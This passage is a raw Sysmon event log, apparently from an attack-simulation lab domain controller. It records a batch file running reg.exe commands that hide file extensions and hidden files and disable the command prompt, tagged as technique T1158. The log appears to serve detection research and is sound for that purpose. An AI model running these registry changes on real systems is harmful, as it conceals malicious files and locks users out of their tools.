ll.dll+51821 154100x80000000000000009413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.530{266CAFBE-6557-6064-3C01-00000000AE01}2148C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:04:39.520{266CAFBE-6557-6064-3B01-00000000AE01}5148C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHiddenDWORD (0x00000000) 10341000x80000000000000009411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.520{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3B01-00000000AE01}5148C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3B01-00000000AE01}5148C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3B01-00000000AE01}5148C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.518{266CAFBE-6557-6064-3B01-00000000AE01}5148C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t REG_DWORD /d "0" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:04:39.505{266CAFBE-6557-6064-3A01-00000000AE01}3476C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HiddenDWORD (0x00000000) 10341000x80000000000000009402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3A01-00000000AE01}3476C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3A01-00000000AE01}3476C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3A01-00000000AE01}3476C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.508{266CAFBE-6557-6064-3A01-00000000AE01}3476C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d "0" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:04:39.489{266CAFBE-6557-6064-3901-00000000AE01}3144C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExtDWORD (0x00000001) 10341000x80000000000000009393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.489{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3901-00000000AE01}3144C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.489{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.489{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.489{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.489{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.489{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3901-00000000AE01}3144C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.489{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3901-00000000AE01}3144C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.496{266CAFBE-6557-6064-3901-00000000AE01}3144C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:04:39.489{266CAFBE-6557-6064-3801-00000000AE01}2744C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHiddenDWORD (0x00000001) 10341000x80000000000000009384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3801-00000000AE01}2744C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 